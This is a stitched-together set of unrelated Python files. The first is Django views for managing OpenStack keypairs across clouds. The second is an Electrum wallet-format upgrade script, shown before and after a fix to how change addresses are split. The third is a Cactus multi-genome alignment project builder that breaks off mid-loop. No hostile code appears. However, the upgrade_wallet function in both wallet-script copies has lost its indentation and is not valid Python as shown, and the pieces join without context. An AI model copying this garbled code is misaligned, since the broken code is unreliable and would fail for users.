        if remote_user == candidate.cert_cn or remote_user == candidate.username:
            return candidate
def verifyUser(request):
    """Return True when the request maps to a known csv2 user."""
    return bool(getUser(request))
def getSuperUserStatus(request):
    """Return the user's superuser flag, or False for unknown users."""
    auth_user = getUser(request)
    if auth_user is None:
        return False
    return auth_user.is_superuser
# WEB VIEWS
def manage_keys(request, group_name=None, message=None):
    """Render the keypair-management page for a group.

    Builds key_dict keyed by "<fingerprint>;<key_name>", mapping each
    cloud name to a boolean that says whether the key is present there.
    """
    if not verifyUser(request):
        raise PermissionDenied
    user_obj = getUser(request)
    if group_name is None:
        group_name = user_obj.active_group
    # Automapped table classes from the csv2 schema.
    Base, session = get_db_base_and_session()
    Group_Resources = Base.classes.csv2_group_resources
    Keypairs = Base.classes.csv2_keypairs
    User_Group = Base.classes.csv2_user_groups
    user_groups = session.query(User_Group).filter(User_Group.username == user_obj.username)
    group_list = []
    for grp in user_groups:
        grp_name = grp.group_name
        group_list.append(grp_name)
    grp_resources = session.query(Group_Resources).filter(Group_Resources.group_name == group_name)
    key_dict = {}
    num_clouds=0
    for cloud in grp_resources:
        num_clouds=num_clouds+1
        # Default every key seen so far to "absent" on this cloud.
        for key in key_dict:
            key_dict[key][cloud.cloud_name] = False
        cloud_keys = session.query(Keypairs).filter(Keypairs.cloud_name == cloud.cloud_name, Keypairs.group_name == cloud.group_name)
        for key in cloud_keys:
            # issue of renaming here if keys have different names on different clouds
            # the keys will have a unique fingerprint and that is what is used as an identifier
            if (key.fingerprint + ";" + key.key_name) in key_dict:
                dict_key = key.fingerprint + ";" + key.key_name
                key_dict[dict_key][key.cloud_name] = True
            else:
                dict_key = key.fingerprint + ";" + key.key_name
                key_dict[dict_key] = {}
                key_dict[dict_key]["name"] = key.key_name
                key_dict[dict_key][key.cloud_name] = True
    context = {
        "group_resources": grp_resources,
        "key_dict": key_dict,
        "active_group": group_name,
        "message": message,
        "enable_glint": True,
        "user_groups": group_list,
        "num_clouds": num_clouds
    }
    # need to create template
    return render(request, 'glintwebui/manage_keys.html', context)
def upload_keypair(request, group_name=None):
    """Import a user-supplied public key onto each selected cloud (POST only).

    On an invalid key string, re-renders manage_keys with an error
    message; on success, redirects back to manage_keys.
    """
    if not verifyUser(request):
        raise PermissionDenied
    if request.method == 'POST':
        # set up database objects
        Base, session = get_db_base_and_session()
        Group_Resources = Base.classes.csv2_group_resources
        Keypairs = Base.classes.csv2_keypairs
        user = getUser(request)
        # get list of target clouds to upload key to
        cloud_name_list = request.POST.getlist('clouds')
        key_name = request.POST.get("key_name")
        key_string = request.POST.get("key_string")
        grp = request.POST.get("group_name")
        for cloud in cloud_name_list:
            db_cloud = session.query(Group_Resources).filter(Group_Resources.group_name == grp, Group_Resources.cloud_name == cloud).first()
            try:
                new_key = create_keypair(key_name=key_name, key_string=key_string, cloud=db_cloud)
            except Exception as exc:
                logger.error("Failed openstack request to make keypair")
                logger.error(exc)
                logger.error("%s is likely an invalid keystring" % key_string)
                message = "unable to upload key: '%s' is likely an invalid keystring" % key_string
                return manage_keys(request=request, group_name=grp, message=message)
            keypair_dict = {
                "group_name": grp,
                "cloud_name": cloud,
                "fingerprint": new_key.fingerprint,
                "key_name": key_name
            }
            new_keypair = Keypairs(**keypair_dict)
            session.merge(new_keypair)
            try:
                session.commit()
            except Exception as exc:
                logger.error(exc)
                logger.error("Error committing database session after creating new key")
                logger.error("openstack and the database may be out of sync until next keypair poll cycle")
        return redirect("manage_keys")
    else:
        #not a post do nothing
        return None
    # Unreachable: both branches above return.
    return None
def new_keypair(request, group_name=None,):
    """Create a brand-new keypair on each selected cloud (POST only).

    Aborts with an error page if the key name is already in use on any
    target cloud; keys created on earlier clouds in the loop are kept.
    """
    if not verifyUser(request):
        raise PermissionDenied
    if request.method == 'POST':
        # set up database objects
        Base, session = get_db_base_and_session()
        Group_Resources = Base.classes.csv2_group_resources
        Keypairs = Base.classes.csv2_keypairs
        user = getUser(request)
        # get list of target clouds to upload key to
        cloud_name_list = request.POST.getlist('clouds')
        key_name = request.POST.get("key_name")
        grp = request.POST.get("group_name")
        # Only check that needs to be made is if the key name is used on any of the target clouds
        for cloud in cloud_name_list:
            db_keypair = session.query(Keypairs).filter(Keypairs.group_name == grp, Keypairs.cloud_name == cloud, Keypairs.key_name == key_name).one_or_none()
            if db_keypair is None:
                #no entry exists, its safe to create this keypair
                # use the module logger (was logging.info) for consistency
                # with every other function in this module
                logger.info("creating new keypair %s on cloud %s" % (key_name, cloud))
                #get grp resources obj
                cloud_obj = session.query(Group_Resources).filter(Group_Resources.group_name == grp, Group_Resources.cloud_name == cloud).one()
                new_key = create_new_keypair(key_name=key_name, cloud=cloud_obj)
                keypair_dict = {
                    "group_name": grp,
                    "cloud_name": cloud,
                    "fingerprint": new_key.fingerprint,
                    "key_name": key_name
                }
                new_keypair = Keypairs(**keypair_dict)
                session.merge(new_keypair)
                try:
                    session.commit()
                except Exception as exc:
                    logger.error(exc)
                    logger.error("Error committing database session after creating new key")
                    logger.error("openstack and the database may be out of sync until next keypair poll cycle")
            else:
                #keypair name exists on this cloud
                # typo fix in the user-facing message: "transation" -> "transaction"
                message = "Keypair name %s in use on cloud: %s. Aborting transaction, keypair may have been created on some clouds" % (key_name, cloud)
                logger.error(message)
                return manage_keys(request=request, group_name=grp, message=message)
        return redirect("manage_keys")
    else:
        #not a post do nothing
        return None
def save_keypairs(request, group_name=None, message=None):
    """Sync checkbox state from the manage_keys form to the clouds (POST only).

    Pass 1 transfers every checked key to clouds that lack it; pass 2
    deletes keys that were unchecked. Redirects to manage_keys when done.
    """
    if not verifyUser(request):
        raise PermissionDenied
    user_obj = getUser(request)
    if group_name is None:
        group_name = user_obj.active_group
    if group_name is None:
        return None
    if request.method == 'POST':
        try:
            #set up database objects
            Base, session = get_db_base_and_session()
            Group_Resources = Base.classes.csv2_group_resources
            Keypairs = Base.classes.csv2_keypairs
            # get list of clouds for this group
            # for each cloud: check_list = request.POST.getlist(cloud.cloud_name)
            # check the checklist for diffs (add/remove keys)
            grp_resources = session.query(Group_Resources).filter(Group_Resources.group_name == group_name)
            logger.info("Checking for keys to transfer")
            for cloud in grp_resources:
                #check_list will only have the names of keys checked for that cloud
                check_list = request.POST.getlist(cloud.cloud_name)
                #cross reference check list against what is in database:
                cloud_keys = session.query(Keypairs).filter(Keypairs.group_name == group_name, Keypairs.cloud_name == cloud.cloud_name)
                cloud_fingerprints = []
                for keypair in cloud_keys:
                    cloud_fingerprints.append(keypair.fingerprint + ";" + keypair.key_name)
                # check for new key transfers
                for keypair_key in check_list:
                    if keypair_key not in cloud_fingerprints:
                        # transfer key to this cloud
                        logger.info("%s not found in %s" % (keypair_key, cloud_fingerprints))
                        logger.info("Found key: %s to transfer to %s" % (keypair_key, cloud.cloud_name))
                        split_key = keypair_key.split(";")
                        fingerprint = split_key[0]
                        key_name = split_key[1]
                        # get existing keypair: need name, public_key, key_type and ?user?
                        logger.info("getting source keypair database object...")
                        src_keypair = session.query(Keypairs).filter(Keypairs.fingerprint == fingerprint, Keypairs.key_name == key_name).first()
                        # get group resources corresponding to that keypair
                        logger.info("getting source cloud...")
                        src_cloud = session.query(Group_Resources).filter(Group_Resources.group_name == src_keypair.group_name, Group_Resources.cloud_name == src_keypair.cloud_name).first()
                        # download key from that group resources
                        logger.info("getting source keypair openstack object...")
                        os_keypair = get_keypair(keypair_key, src_cloud)
                        # upload key to current "cloud"
                        logger.info("transferring keypair...")
                        transfer_keypair(os_keypair, cloud)
                        keypair_dict = {
                            "group_name": group_name,
                            "cloud_name": cloud.cloud_name,
                            "fingerprint": fingerprint,
                            "key_name": key_name
                        }
                        new_keypair = Keypairs(**keypair_dict)
                        session.merge(new_keypair)
                        try:
                            session.commit()
                        except Exception as exc:
                            logger.error(exc)
                            logger.error("Error committing database session after proccessing key transfers")
                            logger.error("openstack and the database may be out of sync until next keypair poll cycle")
            # we need to do the entire loop of the clouds twice so we can do all the transfers, then all the deletes
            logger.info("Checking for keys to delete")
            for cloud in grp_resources:
                #check_list will only have the names of keys checked for that cloud
                check_list = request.POST.getlist(cloud.cloud_name)
                #cross reference check list against what is in database:
                cloud_keys = session.query(Keypairs).filter(Keypairs.group_name == group_name, Keypairs.cloud_name == cloud.cloud_name)
                for keypair in cloud_keys:
                    if (keypair.fingerprint + ";" + keypair.key_name) not in check_list:
                        # key has been deleted from this cloud:
                        logger.info("Found key to delete: %s" % keypair.key_name)
                        delete_keypair(keypair.key_name, cloud)
                        # delete from database
                        session.delete(keypair)
                        try:
                            session.commit()
                        except Exception as exc:
                            logger.error(exc)
                            logger.error("Error committing database session after proccessing key transfers")
                            logger.error("openstack and the database may be out of sync until next keypair poll cycle")
        except Exception as exc:
            logger.error(exc)
            logger.error("Error setting up database objects or during general execution of save_keypairs")
        return redirect("manage_keys")
    # not a post, do nothing
    return None
|
import electrum, getpass, base64,ast,sys,os
from version import SEED_VERSION
def upgrade_wallet(wallet):
print "walet path:",wallet.path
print "seed version:", wallet.seed_version
if wallet.seed_version == 1 and wallet.use_encryption:
# version 1 used pycrypto for wallet encryption
import Crypto
from Crypto.Cipher import AES
BLOCK_SIZE = 32
PADDING = '{'
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
EncodeAES = lambda secret, s: base64.b64encode(AES.new(secret).encrypt(pad(s)))
DecodeAES = lambda secret, e: AES.new(secret).decrypt(base64.b64decode(e)).rstrip(PADDING)
print "please enter your password"
password = getpass.getpass("Password:")
secret = electrum.Hash(password)
try:
seed = DecodeAES( secret, wallet.seed )
private_keys = ast.literal_eval( DecodeAES( secret, wallet.private_keys ) )
except:
print "sorry"
exit(1)
wallet.version = 2
wallet.seed = wallet.pw_encode( seed, password)
wallet.private_keys = wallet.pw_encode( repr( private_keys ), password)
wallet.save()
print "upgraded to version 2"
exit(1)
if wallet.seed_version < SEED_VERSION:
print """Note: your wallet seed is deprecated. Please create a new wallet, and move your coins to the new wallet."""
if __name__ == "__main__":
    # Wallet path comes from argv, falling back to the per-platform default.
    try:
        path = sys.argv[1]
    except:
        # backward compatibility: look for wallet file in the default data directory
        if "HOME" in os.environ:
            wallet_dir = os.path.join( os.environ["HOME"], '.electrum')
        elif "LOCALAPPDATA" in os.environ:
            wallet_dir = os.path.join( os.environ["LOCALAPPDATA"], 'Electrum' )
        elif "APPDATA" in os.environ:
            wallet_dir = os.path.join( os.environ["APPDATA"], 'Electrum' )
        else:
            raise BaseException("No home directory found in environment variables.")
        path = os.path.join( wallet_dir, 'electrum.dat')
    # Slurp the wallet file; it is stored as a Python literal.
    try:
        f = open(path,"r")
        data = f.read()
        f.close()
    except:
        print "file not found", path
        exit(1)
    try:
        x = ast.literal_eval(data)
    except:
        print "error: could not parse wallet"
        exit(1)
    # Oldest (tuple-based) format: rewrite as the dict-based format and stop;
    # the user reruns the script to apply any further upgrades.
    if type(x) == tuple:
        seed_version, use_encryption, fee, host, port, blocks, seed, addresses, private_keys, change_addresses, status, history, labels, addressbook = x
        s = {
            'seed_version':seed_version,
            'use_encryption':use_encryption,
            'master_public_key':None,
            'fee':fee,
            'host':host,
            'port':port,
            'blocks':blocks,
            'seed':seed,
            'addresses':addresses,
            'change_addresses':change_addresses,
            'status':status,
            'history':history,
            'labels':labels,
            'contacts':addressbook
        }
        f = open(path,"w")
        f.write( repr(s) )
        f.close()
        print "wallet format was upgraded."
        exit(1)
    # Dict-based format: let the Wallet class read it; on a read failure,
    # attempt the upgrade path.
    wallet = electrum.Wallet(path)
    try:
        found = wallet.read()
        if found:
            print wallet.path
        else:
            print "wallet not found."
    except BaseException:
        upgrade_wallet(wallet)
Fix change addresses in upgrade script
import electrum, getpass, base64,ast,sys,os
from version import SEED_VERSION
def upgrade_wallet(wallet):
print "walet path:",wallet.path
print "seed version:", wallet.seed_version
if wallet.seed_version == 1 and wallet.use_encryption:
# version 1 used pycrypto for wallet encryption
import Crypto
from Crypto.Cipher import AES
BLOCK_SIZE = 32
PADDING = '{'
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
EncodeAES = lambda secret, s: base64.b64encode(AES.new(secret).encrypt(pad(s)))
DecodeAES = lambda secret, e: AES.new(secret).decrypt(base64.b64decode(e)).rstrip(PADDING)
print "please enter your password"
password = getpass.getpass("Password:")
secret = electrum.Hash(password)
try:
seed = DecodeAES( secret, wallet.seed )
private_keys = ast.literal_eval( DecodeAES( secret, wallet.private_keys ) )
except:
print "sorry"
exit(1)
wallet.version = 2
wallet.seed = wallet.pw_encode( seed, password)
wallet.private_keys = wallet.pw_encode( repr( private_keys ), password)
wallet.save()
print "upgraded to version 2"
exit(1)
if wallet.seed_version < SEED_VERSION:
print """Note: your wallet seed is deprecated. Please create a new wallet, and move your coins to the new wallet."""
if __name__ == "__main__":
    # Wallet path comes from argv, falling back to the per-platform default.
    try:
        path = sys.argv[1]
    except:
        # backward compatibility: look for wallet file in the default data directory
        if "HOME" in os.environ:
            wallet_dir = os.path.join( os.environ["HOME"], '.electrum')
        elif "LOCALAPPDATA" in os.environ:
            wallet_dir = os.path.join( os.environ["LOCALAPPDATA"], 'Electrum' )
        elif "APPDATA" in os.environ:
            wallet_dir = os.path.join( os.environ["APPDATA"], 'Electrum' )
        else:
            raise BaseException("No home directory found in environment variables.")
        path = os.path.join( wallet_dir, 'electrum.dat')
    # Slurp the wallet file; it is stored as a Python literal.
    try:
        f = open(path,"r")
        data = f.read()
        f.close()
    except:
        print "file not found", path
        exit(1)
    try:
        x = ast.literal_eval(data)
    except:
        print "error: could not parse wallet"
        exit(1)
    # Oldest (tuple-based) format: rewrite as the dict-based format and stop;
    # the user reruns the script to apply any further upgrades.
    if type(x) == tuple:
        seed_version, use_encryption, fee, host, port, blocks, seed, all_addresses, private_keys, change_indexes, status, history, labels, addressbook = x
        # change_indexes holds positions into all_addresses; split the flat
        # list into receiving and change addresses
        addresses = []
        change_addresses = []
        for i in range(len(all_addresses)):
            if i in change_indexes:
                change_addresses.append(all_addresses[i])
            else:
                addresses.append(all_addresses[i])
        s = {
            'seed_version':seed_version,
            'use_encryption':use_encryption,
            'master_public_key':None,
            'fee':fee,
            'host':host,
            'port':port,
            'blocks':blocks,
            'seed':seed,
            'addresses':addresses,
            'change_addresses':change_addresses,
            'status':status,
            'history':history,
            'labels':labels,
            'contacts':addressbook
        }
        f = open(path,"w")
        f.write( repr(s) )
        f.close()
        print "wallet format was upgraded."
        exit(1)
    # Dict-based format: let the Wallet class read it; on a read failure,
    # attempt the upgrade path.
    wallet = electrum.Wallet(path)
    try:
        found = wallet.read()
        if found:
            print wallet.path
        else:
            print "wallet not found."
    except BaseException:
        upgrade_wallet(wallet)
|
#!/usr/bin/env python
#Copyright (C) 2011 by Glenn Hickey
#
#Released under the MIT license, see LICENSE.txt
#!/usr/bin/env python
"""Create the multi_cactus xml and directory structure from a workflow template
"""
import os
import sys
from optparse import OptionParser
import xml.etree.ElementTree as ET
import copy
from cactus.progressive.multiCactusProject import MultiCactusProject
from cactus.progressive.multiCactusTree import MultiCactusTree
from cactus.shared.experimentWrapper import ExperimentWrapper
from cactus.shared.configWrapper import ConfigWrapper
from cactus.progressive.outgroup import GreedyOutgroup, DynamicOutgroup
from sonLib.nxnewick import NXNewick
from cactus.preprocessor.cactus_preprocessor import CactusPreprocessor
def createMCProject(tree, experiment, config, options):
    """Build a MultiCactusProject: tree decomposition plus outgroup assignment.

    The input species tree is wrapped in a MultiCactusTree, unnamed internal
    nodes are named, and one sub-experiment xml path is registered per subtree
    root. Outgroups are then chosen according to the configured strategy, and
    the tree is finally rerooted at the requested alignment root (see
    specifyAlignmentRoot).

    tree: species tree taken from the experiment template
    experiment: ExperimentWrapper template
    config: ConfigWrapper template
    options: object providing path, root and outgroupNames
    Returns the populated MultiCactusProject.
    Raises RuntimeError for an unknown root name or outgroup strategy.
    """
    mcTree = MultiCactusTree(tree, config.getSubtreeSize())
    mcTree.nameUnlabeledInternalNodes(config.getDefaultInternalNodePrefix())
    mcTree.computeSubtreeRoots()
    mcProj = MultiCactusProject()
    mcProj.mcTree = mcTree
    # copy so later reassignment doesn't alias the experiment's list
    mcProj.inputSequences = experiment.getSequences()[:]
    mcProj.outputSequenceDir = experiment.getOutputSequenceDir()
    if config.getDoSelfAlignment():
        mcTree.addSelfEdges()
    # one sub-experiment xml per subtree root, under <project path>/<name>/
    for name in mcProj.mcTree.getSubtreeRootNames():
        expPath = "%s/%s/%s_experiment.xml" % (options.path, name, name)
        mcProj.expMap[name] = os.path.abspath(expPath)
    alignmentRootId = mcProj.mcTree.getRootId()
    if options.root is not None:
        try:
            alignmentRootId = mcProj.mcTree.getNodeId(options.root)
        except:
            raise RuntimeError("Specified root name %s not found in tree" % options.root)
    mcProj.outgroup = None
    if config.getOutgroupStrategy() == 'greedy':
        # use the provided outgroup candidates, or use all outgroups
        # as candidates if none are given
        mcProj.outgroup = GreedyOutgroup()
        mcProj.outgroup.importTree(mcProj.mcTree, alignmentRootId)
        mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
                               candidateSet=options.outgroupNames,
                               candidateChildFrac=config.getOutgroupAncestorQualityFraction(),
                               maxNumOutgroups=config.getMaxNumOutgroups())
    elif config.getOutgroupStrategy() == 'greedyLeaves':
        # use all leaves as outgroups, unless outgroup candidates are given
        mcProj.outgroup = GreedyOutgroup()
        mcProj.outgroup.importTree(mcProj.mcTree, alignmentRootId)
        ogSet = options.outgroupNames
        if ogSet is None:
            ogSet = set([mcProj.mcTree.getName(x) for x in mcProj.mcTree.getLeaves()])
        mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
                               candidateSet=ogSet,
                               candidateChildFrac=2.0,
                               maxNumOutgroups=config.getMaxNumOutgroups())
    elif config.getOutgroupStrategy() == 'greedyPreference':
        # prefer the provided outgroup candidates, if any, but use
        # other nodes as "filler" if we can't find enough.
        mcProj.outgroup = GreedyOutgroup()
        mcProj.outgroup.importTree(mcProj.mcTree, alignmentRootId)
        mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
                               candidateSet=options.outgroupNames,
                               candidateChildFrac=config.getOutgroupAncestorQualityFraction(),
                               maxNumOutgroups=config.getMaxNumOutgroups())
        # second pass with no candidate restriction fills remaining slots
        mcProj.outgroup.greedy(threshold=config.getOutgroupThreshold(),
                               candidateSet=None,
                               candidateChildFrac=config.getOutgroupAncestorQualityFraction(),
                               maxNumOutgroups=config.getMaxNumOutgroups())
    elif config.getOutgroupStrategy() == 'dynamic':
        # dynamic programming algorithm that exactly optimizes probability
        # that base in target node aligns to at least one base in the
        # outgroup set. Caveats are that it only returns leaves, and
        # the model used for optimization is super naive. Still, it does
        # some things better than greedy approaches such as properly account
        # for phylogenetic redundancy, as well as try to factor assembly
        # size/quality automatically.
        mcProj.outgroup = DynamicOutgroup()
        mcProj.outgroup.importTree(mcProj.mcTree, mcProj.getInputSequenceMap(), alignmentRootId,
                                   candidateSet=options.outgroupNames)
        mcProj.outgroup.compute(maxNumOutgroups=config.getMaxNumOutgroups())
    elif config.getOutgroupStrategy() != 'none':
        raise RuntimeError("Could not understand outgroup strategy %s" % config.getOutgroupStrategy())
    # if necessary, we reroot the tree at the specified alignment root id. all leaf genomes
    # that are no longer in the tree, but still used as outgroups, are moved into special fields
    # so that we can remember to, say, get their paths for preprocessing.
    specifyAlignmentRoot(mcProj, alignmentRootId)
    return mcProj
# it is possible that we start with a much bigger tree than we actually want to align
# (controlled by the --root option in cactus_createMultiCactusProject.py). We use
# the entire tree when selecting outgroups, but right afterward have no use for
# genomes that are neither outgroups, nor in the alignment. We especially don't
# want to waste time preprocessing them. This function reroots the tree at the
# alignment root then tacks on all the outgroups from outside the new tree
# (which must be leaves) as children of the root
def specifyAlignmentRoot(mcProj, alignmentRootId):
    """Reroot the project tree at alignmentRootId.

    Leaf genomes that fall outside the new subtree but are still used as
    outgroups are re-attached as children of the new root and remembered in
    mcProj.externalOutgroupNames (e.g. so their paths can still be found for
    preprocessing). Experiment entries for removed nodes are dropped and
    mcProj.inputSequences is rebuilt in postorder over the new tree.
    """
    # ugly hack to keep track of external outgroups for root experiment (yuck)
    mcProj.externalOutgroupNames = set()
    # keep around the entire un-rerooted tree so that we can calculate
    # the induced species trees for each node correctly -- gross!
    mcProj.entireTree = copy.deepcopy(mcProj.mcTree)
    # nothing to do
    if alignmentRootId == mcProj.mcTree.getRootId():
        return
    # dig out every outgroup
    outGroupNames = set()
    if mcProj.outgroup is not None:
        for event, ogNameDistList in mcProj.outgroup.ogMap.items():
            for og, dist in ogNameDistList:
                outGroupNames.add(og)
    # i don't like this but we have to assume here that the sequences are
    # written in postorder (as in experiments)
    allLeafMap = dict()
    idx = 0
    for node in mcProj.mcTree.postOrderTraversal():
        if mcProj.mcTree.isLeaf(node) is True:
            allLeafMap[mcProj.mcTree.getName(node)] = mcProj.inputSequences[idx]
            idx += 1
    # find outgroups we want to extract
    keptNodes = set([x for x in mcProj.mcTree.postOrderTraversal(alignmentRootId)])
    deadNodes = []
    extractOutgroupMap = dict()
    for node in mcProj.mcTree.postOrderTraversal():
        if node not in keptNodes:
            deadNodes.append(node)
            name = mcProj.mcTree.getName(node)
            if name in outGroupNames:
                assert name in allLeafMap
                extractOutgroupMap[name] = allLeafMap[name]
                mcProj.externalOutgroupNames.add(name)
    # reroot the tree!
    mcProj.mcTree.reroot(alignmentRootId)
    # add the outgroups to the tree (and sequence map)
    # computing distance to new root for each one
    for ogName, ogPath in extractOutgroupMap.items():
        ogId = mcProj.mcTree.getNodeId(ogName)
        dist = 0.
        x = ogId
        while mcProj.mcTree.hasParent(x):
            d = mcProj.mcTree.getWeight(mcProj.mcTree.getParent(x), x)
            if d is None:
                # any unknown branch length makes the whole distance unknown
                dist = None
                break
            else:
                dist += d
            x = mcProj.mcTree.getParent(x)
        mcProj.mcTree.addOutgroup(ogName, dist)
        allLeafMap[ogName] = ogPath
    # remove any experiment directories that have become invalid.
    # iterate a snapshot of the keys: deleting from a dict while iterating
    # its live key view raises RuntimeError on Python 3
    for event in list(mcProj.expMap.keys()):
        if mcProj.mcTree.getNodeId(event) in deadNodes:
            del mcProj.expMap[event]
    # flush out all unused nodes, and set the new root
    for node in deadNodes:
        assert mcProj.mcTree.hasParent(node)
        mcProj.mcTree.removeEdge(mcProj.mcTree.getParent(node), node)
    # reset input sequences to only contain genomes in tree (making sure to
    # keep in postorder)
    mcProj.inputSequences = []
    for node in mcProj.mcTree.postOrderTraversal():
        if mcProj.mcTree.isLeaf(node):
            mcProj.inputSequences.append(allLeafMap[mcProj.mcTree.getName(node)])
# go through the tree (located in the template experiment)
# and make sure event names are unique up until the first dot
def cleanEventTree(experiment):
    """Sanitize event names in the experiment's species tree, in place.

    Unnamed internal nodes get names, dots in names are replaced with
    underscores (warning on stderr), a missing branch length raises, and
    duplicate names are made unique by appending a counter. The cleaned tree
    is written back into the experiment xml and its sequence map is rebuilt.
    """
    tree = MultiCactusTree(experiment.getTree())
    tree.nameUnlabeledInternalNodes()
    for node in tree.breadthFirstTraversal():
        if tree.hasName(node):
            name = tree.getName(node)
            if '.' in name:
                newName = name.replace('.', '_')
                sys.stderr.write('WARNING renaming event %s to %s\n' %(name, newName))
                tree.setName(node, newName)
                name = newName
        parent = tree.getParent(node)
        if parent is not None:
            weight = tree.getWeight(parent, node)
            if weight is None:
                raise RuntimeError('Missing branch length in species_tree tree')
    # keep renaming until a full pass over all node pairs finds no duplicates
    redoPrefix = True
    newSuffix = 0
    while redoPrefix is True:
        redoPrefix = False
        for node1 in tree.breadthFirstTraversal():
            name1 = tree.getName(node1)
            for node2 in tree.breadthFirstTraversal():
                name2 = tree.getName(node2)
                if node1 != node2 and name1 == name2:
                    newName = "%s%i" % (name2, newSuffix)
                    newSuffix += 1
                    tree.setName(node2, newName)
                    sys.stderr.write('WARNING renaming event %s to %s\n' % (
                        name2, newName))
                    redoPrefix = True
    experiment.xmlRoot.attrib["species_tree"] = NXNewick().writeString(tree)
    experiment.seqMap = experiment.buildSequenceMap()
# Make the subdirs for each subproblem: name/ and name/name_DB
# and write the experiment files
# and copy over a config with updated reference field
def createFileStructure(mcProj, expTemplate, configTemplate, options):
    """Create <name>/ and <name>/<name>_DB dirs for every subproblem, and
    write each sub-experiment xml plus a config copy with its reference
    field set to the subproblem's name."""
    if not os.path.exists(options.path):
        os.makedirs(options.path)
    mcProj.writeXML(os.path.join(options.path, "%s_project.xml" % options.name))
    seqMap = expTemplate.seqMap
    portOffset = 0
    # first pass: every subproblem's reconstructed sequence will live at
    # <name>/<name>.fa, so register those paths before writing experiments
    for name, expPath in mcProj.expMap.items():
        path = os.path.join(options.path, name)
        seqMap[name] = os.path.join(path, name + '.fa')
    for name, expPath in mcProj.expMap.items():
        path = os.path.join(options.path, name)
        children = mcProj.entireTree.getChildNames(name)
        exp = copy.deepcopy(expTemplate)
        # Get outgroups
        outgroups = []
        if configTemplate.getOutgroupStrategy() != 'none' \
            and name in mcProj.outgroup.ogMap:
            for og, ogDist in mcProj.outgroup.ogMap[name]:
                assert og in seqMap, "No sequence found for outgroup: %s" % og
                outgroups += [og]
        # Get subtree connecting children + outgroups
        assert len(children) > 0
        subtree = mcProj.entireTree.extractSpanningTree(children + outgroups)
        dbBase = path
        if expTemplate.getDbDir() is not None:
            dbBase = os.path.abspath(expTemplate.getDbDir())
        exp.setDbDir(os.path.join(dbBase, name, "%s_DB" % name))
        if expTemplate.getDbType() == "kyoto_tycoon" and \
            os.path.splitext(name)[1] != ".kch":
            exp.setDbName("%s.kch" % name)
        else:
            exp.setDbName(name)
        if expTemplate.getDbType() == "kyoto_tycoon":
            # each subproblem's database server gets its own port
            exp.setDbPort(expTemplate.getDbPort() + portOffset)
            portOffset += 1
            host = expTemplate.getDbHost()
            if host is not None:
                exp.setDbHost(host)
        exp.setReferencePath(os.path.join(path, name + '.fa'))
        if configTemplate.getBuildHal() == True:
            exp.setHALPath(os.path.join(path, "%s_hal.c2h" % name))
        if configTemplate.getBuildFasta() == True:
            exp.setHALFastaPath(os.path.join(path, "%s_hal.fa" % name))
        exp.updateTree(subtree, seqMap, outgroups)
        exp.setConfigPath(os.path.join(path, "%s_config.xml" % name))
        if not os.path.exists(exp.getDbDir()):
            os.makedirs(exp.getDbDir())
        if not os.path.exists(path):
            os.makedirs(path)
        exp.writeXML(expPath)
        config = ConfigWrapper(copy.deepcopy(configTemplate.xmlRoot))
        config.setReferenceName(name)
        config.writeXML(exp.getConfigPath())
def checkInputSequencePaths(exp):
    """Warn on stderr about input sequence paths that look missing or empty.

    Paths containing a URL scheme (e.g. s3://bucket/...) refer to remote
    storage and cannot be checked against the local filesystem, so they are
    skipped instead of producing spurious "does not exist" warnings.
    """
    for event, seq in exp.seqMap.items():
        # remote locations (s3://, http://, ...) can't be stat'd locally
        if "://" in seq:
            continue
        if not os.path.exists(seq):
            sys.stderr.write("WARNING: sequence path %s does not exist\n" % seq)
        elif os.path.isdir(seq):
            # count non-hidden entries; an empty directory is probably a mistake
            numVisible = 0
            for entry in os.listdir(seq):
                if entry[0] != '.':
                    numVisible += 1
            if numVisible == 0:
                sys.stderr.write("WARNING: sequence path %s is an empty directory\n" % seq)
class CreateMultiCactusProjectOptions:
    """Bundle of settings consumed by project creation.

    Mirrors the command-line options of the script so the project-creation
    code can also be driven programmatically (see
    runCreateMultiCactusProject).
    """
    def __init__(self, expFile, projectFile, fixNames,
                 outgroupNames, rootOutgroupDists, rootOutgroupPaths,
                 root, overwrite):
        # source experiment template and destination project directory
        self.expFile = expFile
        self.path = projectFile
        # the project takes its name from the final path component
        self.name = os.path.basename(self.path)
        self.fixNames = fixNames
        self.outgroupNames = outgroupNames
        self.rootOutgroupDists = rootOutgroupDists
        self.rootOutgroupPaths = rootOutgroupPaths
        self.root = root
        self.overwrite = overwrite
def runCreateMultiCactusProject(expFile, projectFile, fixNames=False,
        outgroupNames=None, rootOutgroupDists=None, rootOutgroupPaths=None,
        root=None, overwrite=False):
    """Programmatic entry point: build a multi-cactus project from an
    experiment xml, mirroring the command-line path in main()."""
    options = CreateMultiCactusProjectOptions(expFile, projectFile, fixNames=fixNames,
            outgroupNames=outgroupNames, rootOutgroupDists=rootOutgroupDists,
            rootOutgroupPaths=rootOutgroupPaths, root=root, overwrite=overwrite)
    expTemplate = ExperimentWrapper(ET.parse(options.expFile).getroot())
    configPath = expTemplate.getConfigPath()
    confTemplate = ConfigWrapper(ET.parse(configPath).getroot())
    if options.fixNames:
        cleanEventTree(expTemplate)
    checkInputSequencePaths(expTemplate)
    tree = expTemplate.getTree()
    # validate any caller-specified outgroups against the tree's leaves
    if options.outgroupNames is not None:
        options.outgroupNames = set(options.outgroupNames)
        projNames = set([tree.getName(x) for x in tree.getLeaves()])
        for outgroupName in options.outgroupNames:
            if outgroupName not in projNames:
                raise RuntimeError("Specified outgroup %s not found in tree" % outgroupName)
    mcProj = createMCProject(tree, expTemplate, confTemplate, options)
    #Replace the sequences with output sequences
    expTemplate.updateTree(mcProj.mcTree, expTemplate.buildSequenceMap())
    expTemplate.setSequences(CactusPreprocessor.getOutputSequenceFiles(mcProj.inputSequences, expTemplate.getOutputSequenceDir()))
    if options.rootOutgroupPaths is not None:
        # hacky -- add the root outgroup to the tree after everything
        # else. This ends up being ugly, but avoids running into
        # problems with assumptions about tree structure
        #
        # [this hack is hopefully made redundant by the --root option]
        #
        mcProj.inputSequences.extend(options.rootOutgroupPaths)
        # replace the root outgroup sequence by post-processed output
        for i, (outgroupPath, outgroupDist) in enumerate(zip(options.rootOutgroupPaths, options.rootOutgroupDists)):
